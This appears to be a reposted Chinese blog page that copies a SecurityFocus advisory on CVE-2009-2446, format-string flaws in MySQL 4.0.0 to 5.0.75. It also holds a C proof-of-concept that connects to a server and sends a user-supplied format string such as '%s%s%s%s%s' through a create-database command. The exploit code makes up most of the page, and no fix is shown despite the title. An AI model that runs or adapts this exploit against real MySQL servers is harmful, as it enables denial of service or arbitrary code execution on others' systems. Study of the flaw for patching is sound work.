bugtraq mysql,CVE-2009-2446 MySQL SQL_parse.cc远程格式串漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

作者：weixin_40725706 | 2024-04-21 22:50:08

踩

winserver下cve-2009-2446漏洞修复

source: http://www.securityfocus.com/bid/35609/info

MySQL is prone to multiple format-string vulnerabilities.

Attackers can leverage these issues to execute arbitrary code within the context of the vulnerable application. Failed attacks will likely cause denial-of-service conditions.

MySQL 4.0.0 through 5.0.75 are vulnerable; other versions may also be affected.

#include

#define USE_OLD_FUNCTIONS

#include

#define NullS (char *) 0

int

main (int argc, char **argv)

{

MYSQL *mysql = NULL;

mysql = mysql_init (mysql);

if (!mysql)

{

puts ("Init faild, out of memory?");

return EXIT_FAILURE;

}

if (!mysql_real_connect (mysql, /* MYSQL structure to use */

"localhost", /* server hostname or IP address */

"monty", /* mysql user */

"montypython", /* password */

NULL, /* default database to use, NULL for none */

0, /* port number, 0 for default */

NULL, /* socket file or named pipe name */

CLIENT_FOUND_ROWS /* connection flags */ ))

{

puts ("Connect failed\n");

}

else

{

puts ("Connect OK\n");

// mysql_create_db(mysql, "%s%s%s%s%s");

simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);

}

mysql_close (mysql);

return EXIT_SUCCESS;

}

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/weixin_40725706/article/detail/465529